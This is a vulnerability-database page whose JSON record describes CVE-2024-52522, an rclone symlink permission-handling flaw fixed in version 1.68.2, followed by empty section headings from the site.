  "details": "Rclone is a command-line program to sync files and directories to and from different cloud storage providers. Insecure handling of symlinks with --links and --metadata in rclone while copying to local disk allows unprivileged users to indirectly modify ownership and permissions on symlink target files when a superuser or privileged process performs a copy. This vulnerability could enable privilege escalation and unauthorized access to critical system files, compromising system integrity, confidentiality, and availability. This vulnerability is fixed in 1.68.2.",
  "id": "BIT-rclone-2024-52522",
  "modified": "2025-05-20T10:02:07.006Z",
  "published": "2025-04-14T11:22:08.956Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/commit/01ccf204f42b4f68541b16843292439090a2dcf0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rclone/rclone/security/advisories/GHSA-hrxh-9w67-g4cv"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52522"
    }
  ],
  "schema_version": "1.6.2",
  "summary": "Rclone  Improper Permission and Ownership Handling on Symlink Targets with --links and --metadata"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-52522 (GCVE-0-2024-52522)

FKIE_CVE-2024-52522

CERTFR-2025-AVI-0524

Solutions

GHSA-HRXH-9W67-G4CV

tl;dr:

Summary

Who is affected

Details

PoC

Impact

bit-rclone-2024-52522

Vulnerability from bitnami_vulndb

Tags

Sightings

Nomenclature